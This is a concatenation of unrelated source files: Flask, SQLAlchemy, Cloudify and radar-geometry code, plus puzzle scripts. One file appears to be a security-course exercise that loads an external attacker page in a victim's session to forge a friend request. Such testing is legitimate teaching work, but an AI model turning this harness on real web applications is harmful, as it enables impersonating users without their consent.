    Calculate the mean, variance and standard deviation of the given
    pumpkin weights.

    Returns a (mean, variance, standard deviation) tuple.
    """
    # thinkstats.MeanVar returns (mean, variance); std dev is sqrt(variance).
    mu, var = thinkstats.MeanVar(pumpkins_weight)
    return mu, var, math.sqrt(var)
if __name__ == '__main__':
print Pumpkin(_pumpkins_weight)
| StarcoderdataPython |
1798590 | <reponame>symroe/moto<filename>moto/sdb/urls.py<gh_stars>1000+
from .responses import SimpleDBResponse
# Regex patterns for the SimpleDB endpoint hostnames this backend serves
# (one capture group for the region).
url_bases = [
    r"https?://sdb\.(.+)\.amazonaws\.com",
]
# Path patterns mapped to handlers; moto substitutes each url base for '{0}'.
url_paths = {"{0}/$": SimpleDBResponse.dispatch}
| StarcoderdataPython |
1786890 | import csv;
import datetime
from sqlalchemy import Column, ForeignKey, Integer, String, Date, Boolean
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy.orm import sessionmaker
from pprint import pprint
SQLITE_CONNECTION_STRING = 'sqlite:///adress_person.db'
FIELD_LENGTH = 250
def str2bool(v):
    """Interpret a German/English yes-string as True (case-insensitive)."""
    affirmative = ("ja", "yes", "jaaaaaaa")
    return v.lower() in affirmative
Base = declarative_base()
class Person(Base):
    """ORM model for one address-book entry (one row of the input CSV)."""
    __tablename__ = 'person'
    # Primary key comes from the CSV "Nr." column (see read_and_insert),
    # not from an autoincrement.
    id = Column(Integer, primary_key=True, nullable=False)
    vorname = Column(String(FIELD_LENGTH), nullable=False)   # first name
    nachname = Column(String(FIELD_LENGTH), nullable=False)  # last name
    geburtsdatum = Column(Date(), nullable=True)             # date of birth
    telefon = Column(String(FIELD_LENGTH), nullable=True)    # phone number
    email = Column(String(FIELD_LENGTH), nullable=True)
    newsletter = Column(Boolean(), nullable=True)            # newsletter opt-in
    def __repr__(self) -> str:
        # "<first> - <last>" -- what pprint of query results shows below.
        return self.vorname + " - " +self.nachname
class Address(Base):
    """ORM model for a postal address, linked to its Person via person_id."""
    __tablename__ = 'address'
    id = Column(Integer, primary_key=True)
    street_name = Column(String(FIELD_LENGTH))
    street_number = Column(String(FIELD_LENGTH))
    post_code = Column(String(FIELD_LENGTH), nullable=False)
    city = Column(String(FIELD_LENGTH))
    # Foreign key to the owning person; `person` is the object-level accessor.
    person_id = Column(Integer, ForeignKey('person.id'))
    person = relationship(Person)
engine = create_engine(SQLITE_CONNECTION_STRING)
Base.metadata.create_all(engine)
def read_and_insert():
    """Read the semicolon-delimited test CSV and insert one Person plus one
    Address per row into the SQLite database.

    NOTE(review): the CSV file handle is never closed, a new sessionmaker /
    session is created per row, and `person`/`address` leak to module scope
    via `global` -- worth cleaning up.
    """
    global person, address
    filename = "../../../challenge/Testdaten_1.csv"
    csvReader = csv.DictReader(open(filename, newline=''), skipinitialspace=True, delimiter=';', quotechar='|')
    for row in csvReader:
        # Strip stray whitespace from both header names and cell values.
        row = {x.strip(): y for x, y in row.items()}
        row = dict(zip(row.keys(), [v.strip() if isinstance(v,str) else v for v in row.values()]))
        print(row)
        person = Person()
        person.vorname = row["Vorname"]
        person.nachname = row["Nachname"]
        # Dates arrive as German-style dd.mm.yyyy strings.
        person.geburtsdatum = datetime.datetime.strptime(row["Geburtsdatum"].strip(), "%d.%m.%Y").date()
        person.id = row["Nr."]
        person.email = row["E-Mail"]
        person.telefon = row["Telefon"]
        person.newsletter = str2bool(row["Newsletter"])
        # Split "Streetname 12" into name (first word) and number (last word).
        # NOTE(review): breaks for multi-word street names -- verify data.
        strasse = row["Straße"].split(" ")[0]
        str_number = row["Straße"].split(" ")[len(row["Straße"].split(" ")) - 1]
        address = Address()
        address.street_name = strasse
        address.street_number = str_number
        address.post_code = row["PLZ"].strip()
        address.city = row["Stadt"].strip()
        # Address reuses the person's id and links back to the person row.
        address.id = person.id
        address.person = person
        DBSession = sessionmaker(bind=engine)
        session = DBSession()
        # Insert a Person in the person table
        session.add(person)
        session.commit()
        # Insert an Address in the address table
        session.add(address)
        session.commit()
#read_and_insert()
DBSession = sessionmaker(bind=engine)
session = DBSession()
#print(len(session.query(Person).all()))
#person = session.query(Person).first()
#print(person.vorname)
#session.query(Address).filter(Address.person == person).all()
#session.query(Address).filter(Address.person == person).one()
#address = session.query(Address).filter(Address.person == person).one()
pprint(session.query(Person).filter(Person.vorname == "Pauline").all())
#print(address.post_code)
| StarcoderdataPython |
class image:
    """Sparse image of lit pixels plus an enhancement lookup string.

    img maps (x, y) -> True for lit pixels only; enh is indexed by the 9-bit
    value formed from a pixel's 3x3 neighbourhood (0..511).
    """
    def __init__(self, mx, img, enh):
        # Tracked square bounds [mins, maxs]; pixels outside are background.
        self.mins = 0
        self.maxs = mx
        self.img = img
        self.enh = enh
        # Bit value ('0' or '1') assumed for every pixel outside the bounds,
        # i.e. the state of the infinite background.
        self.default = '0'
    def enhance(self):
        """Apply one enhancement step, growing the tracked bounds by 1."""
        self.mins -= 1
        self.maxs += 1
        # 3x3 neighbourhood offsets in reading order (top-left .. bottom-right),
        # matching the bit order of the enhancement index.
        influence = [(-1,-1),(0,-1),(1,-1),
                     (-1, 0),(0, 0),(1, 0),
                     (-1, 1),(0, 1),(1, 1)]
        new_image = dict()
        # Scan one pixel beyond the (already expanded) bounds so border pixels
        # see their full neighbourhood.
        for py in range(self.mins-1, self.maxs+2):
            for px in range(self.mins-1, self.maxs+2):
                enh_lookup = ''
                for ox, oy in influence:
                    if (px+ox,py+oy) in self.img:
                        enh_lookup += '1'
                    # Out-of-bounds neighbours take the background value.
                    elif px+ox < self.mins or px+ox > self.maxs or py+oy < self.mins or py+oy > self.maxs:
                        enh_lookup += self.default
                    else:
                        enh_lookup += '0'
                if self.enh[int(enh_lookup,2)] == '#':
                    new_image[(px,py)] = True
        self.img = new_image
        return
    def print_img(self):
        """Debug dump of the raw dict plus an ASCII rendering.

        NOTE(review): the ranges exclude self.maxs, so the last row/column of
        the tracked area is not rendered.
        """
        print(self.img)
        for y in range(self.mins,self.maxs):
            line = ''
            for x in range(self.mins,self.maxs):
                if (x,y) in self.img:
                    line += '#'
                else:
                    line += '.'
            print(line)
        return
def import_image(ifile):
    """Parse the puzzle input: line 1 is the enhancement string, then a blank
    line, then a '#'/'.' grid. Returns an image holding only lit pixels."""
    lit_pixels = dict()
    with open(ifile) as f:
        enh = list(f.readline().strip())
        f.readline()  # separator blank line
        row = 0
        for raw in f:
            stripped = raw.strip()
            if not stripped:
                break
            for col, ch in enumerate(stripped):
                if ch == '#':
                    lit_pixels[(col, row)] = True
            row += 1
    return image(row, lit_pixels, enh)
def make_the_rounds(img_file, rounds):
    """Load *img_file*, enhance it *rounds* times, print and return the
    number of lit pixels.

    When the enhancement string turns an all-dark neighbourhood on
    (enh[0] != '.'), the infinite background flickers each step, so the
    out-of-bounds default alternates between '0' and '1'.
    """
    image_class = import_image(img_file)
    for step in range(rounds):
        background_lit = image_class.enh[0] != "." and step % 2 != 0
        image_class.default = "1" if background_lit else "0"
        image_class.enhance()
    print(len(image_class.img))
    return len(image_class.img)
################################
# Script driver: regression-checks the answers for the sample and personal
# puzzle inputs (requires sample.txt / input.txt next to this file).
print("-- Part 1")
assert make_the_rounds("sample.txt",2) == 35
assert make_the_rounds("input.txt",2) == 5179
print("\n-- Part 2")
assert make_the_rounds("sample.txt",50) == 3351
assert make_the_rounds("input.txt",50) == 16112
| StarcoderdataPython |
3395368 | <filename>MFWR/views/upload.py
# Webserver Dependencies
from flask import Flask, render_template, request, redirect, url_for, send_from_directory
from MFWR import app
# Image Upload Dependencies
import os
from werkzeug import secure_filename
def allowed_file(filename):
    """Return True when *filename* has an extension listed in the app's
    ALLOWED_IMAGE_EXTENSIONS config."""
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1]
    return extension in app.config['ALLOWED_IMAGE_EXTENSIONS']
def upload_image(file):
    """ store image to configured location and return url.
    if no file, return nothing. """
    # Returns None implicitly for a missing file or disallowed extension.
    if file and allowed_file(file.filename):
        # secure_filename strips path components / unsafe characters.
        filename = secure_filename(file.filename)
        # NOTE(review): os.getcwd() is concatenated directly with the joined
        # path -- this assumes UPLOAD_FOLDER begins with a path separator;
        # verify the config value.
        file.save(os.getcwd() + os.path.join( app.config['UPLOAD_FOLDER'],
            filename ))
        return url_for('uploaded_image', filename=filename)
# Serve a previously uploaded image back to the client.
# NOTE(review): the bare `print` statement makes this Python-2-only code.
@app.route('/uploads/images/<filename>')
def uploaded_image(filename):
    print "uploaded_image triggered!"
    return send_from_directory(os.getcwd() + app.config['UPLOAD_FOLDER'], filename)
| StarcoderdataPython |
3269260 | # Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import sys
import proxy_common
from cloudify import ctx
from cloudify import exceptions
from cloudify import manager
from cloudify.decorators import operation
@operation
def create_validation(**kwargs):
    """Creation-time validation: fail fast unless the deployment configured
    in the node's `deployment_id` property exists on the manager."""
    ctx.logger.info("Entering create_validation event.")
    client = manager.get_rest_client()
    deployment_id = ctx.node.properties['deployment_id']
    if not deployment_id or deployment_id == '':
        ctx.logger.error("Malformed deployment ID.")
        raise exceptions.NonRecoverableError(
            "Deployment ID is not specified.")
    try:
        # Any REST failure (missing deployment, connectivity) aborts the
        # install as non-recoverable.
        client.deployments.get(deployment_id)
        ctx.logger.info("Success, deployment exists.")
    except Exception as ex:
        ctx.logger.error("Error during obtaining deployment {0}. "
                         "Reason: {1}."
                         .format(deployment_id, str(ex)))
        raise exceptions.NonRecoverableError(
            "Error during obtaining deployment {0}. "
            "Reason: {1}.".format(deployment_id, str(ex)))
    ctx.logger.info("Exiting create_validation event.")
@operation
def wait_for_deployment(deployment_id, **kwargs):
    """Block until the proxied deployment is ready, polling up to the
    node's configured `timeout` property."""
    ctx.logger.info("Entering wait_for_deployment event.")
    ctx.logger.info("Using deployment %s" % deployment_id)
    if not deployment_id:
        raise exceptions.NonRecoverableError(
            "Deployment ID not specified.")
    client = manager.get_rest_client()
    timeout = ctx.node.properties['timeout']
    proxy_common.poll_until_with_timeout(
        proxy_common.check_if_deployment_is_ready(
            client, deployment_id),
        expected_result=True,
        timeout=timeout)
    ctx.logger.info("Exiting wait_for_deployment event.")
@operation
def inherit_deployment_attributes(deployment_id, **kwargs):
    """Copy the proxied deployment's outputs (and optionally its inputs)
    into this instance's runtime properties.

    Which outputs to copy is driven by the node's `inherit_outputs`
    property; inputs are copied under 'proxy_deployment_inputs' when the
    `inherit_inputs` property is truthy.
    """
    ctx.logger.info("Entering obtain_outputs event.")
    client = manager.get_rest_client()
    outputs = ctx.node.properties['inherit_outputs']
    ctx.logger.info("Outputs to inherit: {0}."
                    .format(str(outputs)))
    ctx.logger.info('deployment id %s' % deployment_id)
    inherit_inputs = ctx.node.properties['inherit_inputs']
    # Remember what we inherited so cleanup() can remove it later.
    ctx.instance.runtime_properties.update({
        'inherit_outputs': outputs,
        'deployment_id': deployment_id
    })
    try:
        if inherit_inputs:
            _inputs = client.deployments.get(deployment_id)['inputs']
            ctx.instance.runtime_properties.update(
                {'proxy_deployment_inputs': _inputs})
        deployment_outputs = client.deployments.outputs.get(
            deployment_id)['outputs']
        ctx.logger.info("Available deployment outputs {0}."
                        .format(str(deployment_outputs)))
        ctx.logger.info("Available runtime properties: {0}.".format(
            str(ctx.instance.runtime_properties.keys())
        ))
        # Missing keys are stored as None (dict.get default).
        for key in outputs:
            ctx.instance.runtime_properties.update(
                {key: deployment_outputs.get(key)}
            )
    except Exception as ex:
        ctx.logger.error(
            "Caught exception during obtaining "
            "deployment outputs {0} {1}"
            .format(sys.exc_info()[0], str(ex)))
        raise exceptions.NonRecoverableError(
            "Caught exception during obtaining "
            "deployment outputs {0} {1}. Available runtime properties {2}"
            .format(sys.exc_info()[0], str(ex),
                    str(ctx.instance.runtime_properties.keys())))
    ctx.logger.info("Exiting obtain_outputs event.")
@operation
def cleanup(**kwargs):
    """Remove inherited inputs/outputs from this instance's runtime
    properties (reverses inherit_deployment_attributes)."""
    ctx.logger.info("Entering cleanup_outputs event.")
    outputs = ctx.instance.runtime_properties.get('inherit_outputs', [])
    if ('proxy_deployment_inputs' in
            ctx.instance.runtime_properties):
        del ctx.instance.runtime_properties['proxy_deployment_inputs']
    for key in outputs:
        if key in ctx.instance.runtime_properties:
            del ctx.instance.runtime_properties[key]
    ctx.logger.info("Exiting cleanup_outputs event.")
@operation
def install_deployment(**kwargs):
    """Wait for the proxied deployment to be ready, run its `install`
    workflow (unless reusing an existing deployment), and cache the
    deployment's outputs under the 'outputs' runtime property."""
    ctx.logger.info("Entering install_deployment event.")
    if 'deployment_id' not in ctx.instance.runtime_properties:
        raise exceptions.NonRecoverableError(
            "Deployment ID as runtime property not specified.")
    client = manager.get_rest_client()
    deployment_id = ctx.instance.runtime_properties[
        'deployment_id']
    # NOTE(review): readiness timeout is hard-coded to 900 here, unlike
    # wait_for_deployment which reads the node's `timeout` property.
    proxy_common.poll_until_with_timeout(
        proxy_common.check_if_deployment_is_ready(
            client, deployment_id),
        expected_result=True,
        timeout=900)
    if not ctx.node.properties['use_existing_deployment']:
        proxy_common.execute_workflow(deployment_id,
                                      'install')
    ctx.instance.runtime_properties[
        'outputs'] = (client.deployments.get(
            deployment_id).outputs)
    ctx.logger.info("Exiting install_deployment event.")
@operation
def uninstall_deployment(**kwargs):
    """Run the proxied deployment's `uninstall` workflow, unless it is an
    externally managed (use_existing_deployment) deployment."""
    ctx.logger.info("Entering uninstall_deployment event.")
    if 'deployment_id' not in ctx.instance.runtime_properties:
        raise exceptions.NonRecoverableError(
            "Deployment ID as runtime property not specified.")
    deployment_id = ctx.instance.runtime_properties[
        'deployment_id']
    if not ctx.node.properties['use_existing_deployment']:
        proxy_common.execute_workflow(deployment_id,
                                      'uninstall')
    ctx.logger.info("Exiting uninstall_deployment event.")
@operation
def get_outputs(**kwargs):
    """Relationship operation: copy the target proxy node's inherited
    outputs onto the source instance's runtime properties."""
    # if (ctx.target.node._node.type!='cloudify.nodes.DeploymentProxy'):
    #     raise (NonRecoverableError('invalid target: must connect to DeploymentProxy type'))
    for output in ctx.target.node.properties['inherit_outputs']:
        ctx.source.instance.runtime_properties[output]=ctx.target.instance.runtime_properties[output]
| StarcoderdataPython |
54860 | <reponame>Opty-MISCE/SS
from requests import session, get
from random import randint
from sys import argv
from Common.Driver import runScript
# Security-course exercise: check that the stored-XSS payload hosted on the
# attacker's page makes the victim's browser send a friend request to the
# attacker account on the target application.
SERVER = argv[1]
attackerSERVER = "http://web.tecnico.ulisboa.pt/ist190774/SSof/R2Ai2t0bslrVyMxUOUyO.html"
victimSession = session()
# Random credentials so repeated runs do not collide with existing users.
victimUsername = str(randint(2 ** 27, 2 ** 28))
victimPassword = str(randint(2 ** 27, 2 ** 28))
attackerSession = session()
attackerUsername = "Attacker"
attackerPassword = str(randint(2 ** 27, 2 ** 28))
# Cleaning DB
r = get(SERVER + "/init")
assert "Initialisation DONE!" in r.text
# Register the attacker account.
data = {
    "username": attackerUsername,
    "password": <PASSWORD>
}
r = attackerSession.post(SERVER + "/register", data=data)
assert "Welcome" in r.text
assert attackerUsername in r.text
# Register the victim account.
data = {
    "username": victimUsername,
    "password": <PASSWORD>
}
r = victimSession.post(SERVER + "/register", data=data)
assert "Welcome" in r.text
assert victimUsername in r.text
# The Victim Browser Executes the Malicious Script
# And Make a Friend Request to the Attacker Impersonating the Victim
runScript(SERVER, attackerSERVER, victimSession)
# The forged request must now show up in the attacker's pending list.
r = attackerSession.get(SERVER + "/pending_requests")
assert victimUsername in r.text
print("Success!")
victimSession.close()
attackerSession.close()
| StarcoderdataPython |
171749 | #
# radarbeam.py
#
# module for calculating geometry parameters and magnetic aspect
# angle of radar targets monitored by any radar
#
# use aspect_elaz or aspect_txty to calculate aspect angles of targets
# specified by (el,az) or (tx,ty) angles
#
# Created by <NAME> on 11/29/08 as jrobeam.py
# Copyright (c) 2008 ECE, UIUC. All rights reserved.
# history
# - Aug29,2013 by <NAME>
# -Generate a module that accepts the lon,lat,h coordinates for the location
# of any radar.
# -flattening has been changed from 1/298.257 to 1./298.257223563
# using the WGS84 reference in:
# http://earth-info.nga.mil/GandG/publications/tr8350.2/wgs84fin.pdf
# - A new routine called enu2xyz to move a point from xr,yr,zr to some
# direction east, north, up
def llh2xyz(latg, lon, h):
    """Convert geodetic coordinates to geocentric ECEF coordinates (km).

    latg : geodetic latitude (rad)
    lon  : longitude (rad)
    h    : height above the WGS-84 ellipsoid (km)
    Returns (x, y, z) in km, Cartesian geocentric wrt Greenwich.
    """
    # prime vertical radius of curvature at this geodetic latitude
    n = a_WGS / np.sqrt(1. - flatness * (2. - flatness) * np.sin(latg)**2.)
    cos_lat = np.cos(latg)
    x = (n + h) * cos_lat * np.cos(lon)
    y = (n + h) * cos_lat * np.sin(lon)
    z = (n * (1. - eccentricity**2.) + h) * np.sin(latg)
    return x, y, z
def xyz2llh(x,y,z):
    # returns longitude 'lon', geodetic latitude 'lat', and height 'h'
    # of position (x,y,z) defined in geocentric coordinate system (ECEF)
    # on Oct23,2013 by <NAME>, adding the .all() in order to support
    # arrays
    # Iterative inversion: start from the geocentric latitude and refine
    # the geodetic latitude/height until the update falls below ~3*eps
    # (at most 10 iterations).
    p=np.sqrt(x**2.+y**2.)
    lon=np.arctan2(y,x)
    lat=np.arctan2(z,p)
    latp=lat.copy()
    for i in range(10):
        # prime vertical radius of curvature for the current latitude guess
        n=a_WGS/np.sqrt(1.-flatness*(2-flatness)*np.sin(latp)**2.)
        h=p/np.cos(latp)-n
        lat=np.arctan(z/(p*(1.-n*eccentricity**2./(n+h))))
        if (abs(lat-latp)<3.*eps).all():
            # converged: recompute n and h with the final latitude
            n=a_WGS/np.sqrt(1.-flatness*(2.-flatness)*np.sin(lat)**2.)
            h=p/np.cos(lat)-n
            break
        latp=lat.copy()
    return lat,lon,h
def enu2xyz(xr, yr, zr, east, north, up):
    """Displace the ECEF point (xr, yr, zr) by (east, north, up) km expressed
    in the local tangent frame at that point; returns the new (x, y, z)."""
    latg, lon, h = xyz2llh(xr, yr, zr)
    sin_lat, cos_lat = np.sin(latg), np.cos(latg)
    sin_lon, cos_lon = np.sin(lon), np.cos(lon)
    # columns are the local ENU basis vectors expressed in ECEF coordinates
    rot = np.array([[-sin_lon, -sin_lat * cos_lon, cos_lat * cos_lon],
                    [ cos_lon, -sin_lat * sin_lon, cos_lat * sin_lon],
                    [ 0.,       cos_lat,           sin_lat]])
    x, y, z = np.dot(rot, np.array([east, north, up])) + np.array([xr, yr, zr])
    return x, y, z
def cosBs(year, rr, el, az):
    """Decompose the radar line of sight into direction cosines along the
    magnetic North/East/Up directions at the target.

    Bug fix: the function previously computed ``aspect_angle`` but returned
    the undefined name ``aspect`` (NameError); numpy calls are now also
    qualified with ``np.`` instead of relying on a star import.

    NOTE(review): this legacy function relies on module-level globals
    xyz0, east0, north0, zenith0 (a radar-site basis) that are not defined
    in this module -- presumably injected by the caller's namespace or a
    radarspecs instance; confirm before use.
    """
    # direction cosines wrt east and north
    tx = np.cos(el) * np.sin(az)
    ty = np.cos(el) * np.cos(az)
    tz = np.sin(el)
    xyz = xyz0 + rr * (tx * east0 + ty * north0 + tz * zenith0)  # target vector
    r = np.sqrt(np.dot(xyz, xyz))
    lat, lon, h = xyz2llh(xyz[0], xyz[1], xyz[2])  # target lat, lon, height
    radial = xyz / r  # unit vector to target
    p = np.sqrt(xyz[0]**2 + xyz[1]**2)
    east = np.array([-xyz[1], xyz[0], 0]) / p  # unit vector to east from target
    north = -np.cross(east, radial)            # unit vector to north from target
    rr_ = xyz - xyz0                           # vector from radar to target
    rr_u = rr_ / np.sqrt(np.dot(rr_, rr_))     # unit vector from radar to target
    [bX, bY, bZ, bB] = igrf.igrf_B(year, r - a_igrf, lon / deg, lat / deg)
    bfield = np.array([bX, bY, bZ])
    B = bX * north + bY * east - bZ * radial   # magnetic field vector B
    bn = B / np.sqrt(np.dot(B, B))             # "magnetic north" unit vector
    be = np.cross(bn, radial)
    be = be / np.sqrt(np.dot(be, be))          # magnetic east unit vector
    bu = np.cross(be, bn)                      # magnetic up unit vector
    cosBn = np.dot(bn, rr_u)                   # magnetic north direction-cosine of rr_u
    aspect = np.arccos(cosBn)                  # aspect angle (rad); name now matches the return
    cosBe = np.dot(be, rr_u)                   # magnetic east direction-cosine of rr_u
    cosBu = np.dot(bu, rr_u)                   # magnetic up direction-cosine of rr_u
    # uLOS = cosBe*U(h) + cosBn*V(h) + cosBu*W(h): LOS wind model in terms of
    # wind components and the direction cosines computed above.
    return r, lat, lon, h, xyz, B, aspect, cosBn, cosBe, cosBu
# --------------------------------------------------------------
import numpy as np
from pyigrf import igrf
eps=np.finfo(float).eps # float resolution
deg=np.pi/180. # to express angles in degree values
a_igrf=6371.2 # mean earth radius (km)
# WGS84 constants
# reference:
# http://earth-info.nga.mil/GandG/publications/tr8350.2/wgs84fin.pdf
a_WGS=6378.137 # equatorial radius WGS 84 (semi-major axis) in km
#flatness=1/298.257
flatness = 1./298.257223563 # flattening
b_WGS=a_WGS*(1.-flatness) # WGS polar radius (semi-minor axis) in km
eccentricity=np.sqrt(a_WGS**2-b_WGS**2)/a_WGS # first eccentricity of the ellipsoid
# ------------ radar specifications -------------------------
class radarspecs:
    """Radar site coordinates and coordinate conversions.

    saved locations:
    JRO : lat: -11.947917 , lon: -76.872306, h0: 0.463 km
    JRO_GE : as zoom in with GoogleEarth to the center of the antenna.
    IRIS@ROI
    ALTAIR
    IRIS@URBANA

    Bug fixes relative to the original:
    - dec_ha2el_az lacked ``self`` and referenced the site basis vectors as
      undefined globals; it is now a proper method.
    - aspect_elaz called the module-level name ``xyz2dec_ha`` instead of
      ``self.xyz2dec_ha`` (NameError at runtime).
    - an unknown ``location`` string silently left lat0/lon0/h0 unset; it
      now raises ValueError immediately.
    """
    def __init__(self, lat0=None, lon0=None, h0=None, location=None):
        """Set up the site from a named location, or from explicit geodetic
        lat0/lon0 (degrees) and h0 (km above the reference ellipsoid)."""
        if location is not None:
            loc = location.upper()
            if loc == "JRO":
                # geodetic, the usual map or GPS latitude
                self.lat0 = -11.947917 * deg
                self.lon0 = -76.872306 * deg
                self.h0 = 0.463  # local height in km above reference ellipsoid
            elif loc == "JRO_GE":
                # using google earth to the center of the antenna
                # -11.9514944444 = -(11.+57./60.+5.38/3600.) # 11deg57'5.38"S
                self.lat0 = -11.9514944444 * deg
                # -76.8743916667 = -(76.+52./60.+27.81/3600.) # 76deg52'27.81"W
                self.lon0 = -76.8743916667 * deg
                self.h0 = 0.463  # local height in km above reference ellipsoid
            elif loc == "IRIS@ROI":
                # 9.39794444444 = (9.+23./60.+52.6/3600.) # 9deg23'52.60"N
                self.lat0 = 9.39794444444 * deg
                # 167.469166667 = (167.+28./60.+9./3600.) # 167deg28'9.00"E
                self.lon0 = 167.469166667 * deg
                self.h0 = 0.012
            elif loc == "ALTAIR":
                # 9.39541666667 = (9.+23./60.+43.5/3600.) # 9deg23'43.50"N
                self.lat0 = 9.39541666667 * deg
                # 167.479333333 = (167.+28./60.+45.6/3600.) # 167deg28'45.60"E
                self.lon0 = 167.479333333 * deg
                self.h0 = 0.012
            elif loc == "IRIS@URBANA":
                # 40.16683888888889 = (40.+10./60.+0.62/3600.) # 40deg10'0.62"N
                self.lat0 = 40.16683888888889 * deg
                # -88.1586 = -(88.+9./60.+30.96/3600.) # 88deg9'30.96"W
                self.lon0 = (360. - 88.1586) * deg
                self.h0 = 0.221
            else:
                raise ValueError("unknown radar location: %s" % location)
        elif lat0 is None or lon0 is None or h0 is None:
            # By default: JRO center of antenna with google earth
            self.lat0 = -11.9514944444 * deg
            self.lon0 = -76.8743916667 * deg
            self.h0 = 0.463  # local height in km above reference ellipsoid
        else:
            self.lat0 = lat0 * deg
            self.lon0 = lon0 * deg
            self.h0 = h0  # local height in km above reference ellipsoid
        x0, y0, z0 = llh2xyz(self.lat0, self.lon0, self.h0)
        self.xyz0 = np.array([x0, y0, z0])
        xy0 = np.array([x0, y0])
        p0 = np.sqrt(np.dot(xy0, xy0))
        # unit vectors from the site
        self.east0 = np.array([-y0, x0, 0]) / p0
        # zenith and north directions wrt local ellipsoid
        self.zenith0 = np.array([np.cos(self.lat0) * np.cos(self.lon0),
                                 np.cos(self.lat0) * np.sin(self.lon0),
                                 np.sin(self.lat0)])
        self.north0 = np.cross(self.zenith0, self.east0)
        # orthonormal basis vectors including the JRO on-axis direction
        dec = -12.88 * deg
        ha = -(4. + 37. / 60.) * deg  # on-axis direction at JRO
        self.uo = np.array([np.cos(dec) * np.cos(ha / 4. + self.lon0),  # on axis
                            np.cos(dec) * np.sin(ha / 4. + self.lon0),
                            np.sin(dec)])
        self.ux = np.cross(self.zenith0, self.uo)
        # along the building to the right
        self.ux = self.ux / np.sqrt(np.dot(self.ux, self.ux))
        # away from the building into the valley
        self.uy = np.cross(self.uo, self.ux)
    def locations(self):
        """Names accepted by the ``location=`` constructor argument."""
        return ["JRO", "JRO_GE", "IRIS@ROI", "ALTAIR", "IRIS@URBANA"]
    def dec_ha2el_az(self, dec, ha):
        """Elevation and azimuth (deg) of a radar beam wrt the local tangent
        plane, for a beam given by declination dec (deg) and hour angle ha
        (min) at this site.

        Fixed to be a proper method: the original had no ``self`` parameter
        and referenced lon0/zenith0/north0/east0 as undefined globals.
        """
        lat = dec * deg  # on celestial sphere
        lon = 2. * np.pi * (ha / (24. * 60.))
        lon = lon + self.lon0  # on celestial sphere
        vec = np.array([np.cos(lat) * np.cos(lon),
                        np.cos(lat) * np.sin(lon),
                        np.sin(lat)])
        # projection of the beam onto the local horizontal plane
        hor = vec - np.dot(vec, self.zenith0) * self.zenith0
        hor = hor / np.sqrt(np.dot(hor, hor))
        el = np.arccos(np.dot(hor, vec)) / deg
        north = np.dot(hor, self.north0)
        east = np.dot(hor, self.east0)
        az = np.arctan2(east, north) / deg
        return el, az
    def xyz2dec_ha(self, vec):
        """Declination (deg) and hour angle (min) of the direction ``vec``,
        i.e. latitude and relative longitude of the beam-spot on the
        celestial sphere (the rr -> infinity limit)."""
        vec = vec / np.sqrt(np.dot(vec, vec))
        p = np.sqrt(vec[0]**2. + vec[1]**2.)
        dec = np.arctan2(vec[2], p) / deg  # in degrees
        ha = (np.arctan2(vec[1], vec[0]) - self.lon0) * (24. / (2. * np.pi)) * 60.  # in minutes
        return dec, ha
    def aspect_angle(self, year, xyz):
        """Magnetic aspect angle (rad) of a target at geocentric ECEF
        position ``xyz``; returns (range, lat, lon, aspect)."""
        r = np.sqrt(np.dot(xyz, xyz))
        p = np.sqrt(xyz[0]**2. + xyz[1]**2.)
        lat = np.arctan2(xyz[2], p)
        lon = np.arctan2(xyz[1], xyz[0])
        radial = xyz / r  # directions from target
        east = np.array([-xyz[1], xyz[0], 0.]) / p
        north = -np.cross(east, radial)
        rr = xyz - self.xyz0
        u_rr = rr / np.sqrt(np.dot(rr, rr))  # unit vector from radar to target
        [bX, bY, bZ, bB] = igrf.igrf_B(year, r - a_igrf, lon / deg, lat / deg)
        bfield = np.array([bX, bY, bZ])
        B = bX * north + bY * east - bZ * radial
        u_B = B / np.sqrt(np.dot(B, B))
        aspect = np.arccos(np.dot(u_B, u_rr))
        return r, lat, lon, aspect
    def aspect_txty(self, year, rr, tx, ty):
        """Magnetic aspect angle and geocentric coordinates of a target at
        range rr (km) with direction cosines tx (along the building) and
        ty (into the building)."""
        tz = np.sqrt(1. - tx**2. - ty**2.)
        # geocentric coordinates of target
        xyz = self.xyz0 + rr * (tx * self.ux + ty * self.uy + tz * self.uo)
        [r, lat, lon, aspect] = self.aspect_angle(year, xyz)
        [dec, ha] = self.xyz2dec_ha(xyz - self.xyz0)
        return r, lon, lat, dec, ha, aspect
    def aspect_elaz(self, year, rr, el, az):
        """Magnetic aspect angle and geocentric coordinates of a target at
        range rr (km), elevation el (rad above the local tangent plane) and
        azimuth az (rad east of local north)."""
        tx = np.cos(el) * np.sin(az)  # direction cosines wrt east and north
        ty = np.cos(el) * np.cos(az)
        tz = np.sin(el)
        # geocentric coordinates of target:
        xyz = self.xyz0 + rr * (tx * self.east0 + ty * self.north0 + tz * self.zenith0)
        [r, lat, lon, aspect] = self.aspect_angle(year, xyz)
        # bug fix: was the bare module name xyz2dec_ha (NameError)
        [dec, ha] = self.xyz2dec_ha(xyz - self.xyz0)
        return r, lon, lat, dec, ha, aspect
| StarcoderdataPython |
import random
# One-shot subtraction quiz (the repeat loop was left disabled).
#while True:
num1 = random.randint(1,100)
num2 = random.randint(1,100)
# Prompt with "a-b=" and read the user's integer answer.
result = int(input(f'{num1}-{num2}='))
if result == (num1-num2) :
    print("정답입니다.")  # "Correct!"
else :
    print("틀렸습니다.")  # "Wrong!"
3300288 | # 先把API com元件初始化
import os
# 第一種讓群益API元件可導入讓Python code使用的方法
#import win32com.client
#from ctypes import WinDLL,byref
#from ctypes.wintypes import MSG
#SKCenterLib = win32com.client.Dispatch("{AC30BAB5-194A-4515-A8D3-6260749F8577}")
#SKQuoteLib = win32com.client.Dispatch("{E7BCB8BB-E1F0-4F6F-A944-2679195E5807}")
# 第二種讓群益API元件可導入Python code內用的物件宣告
import comtypes.client
#comtypes.client.GetModule(os.path.split(os.path.realpath(__file__))[0] + r'\SKCOM.dll')
import comtypes.gen.SKCOMLib as sk
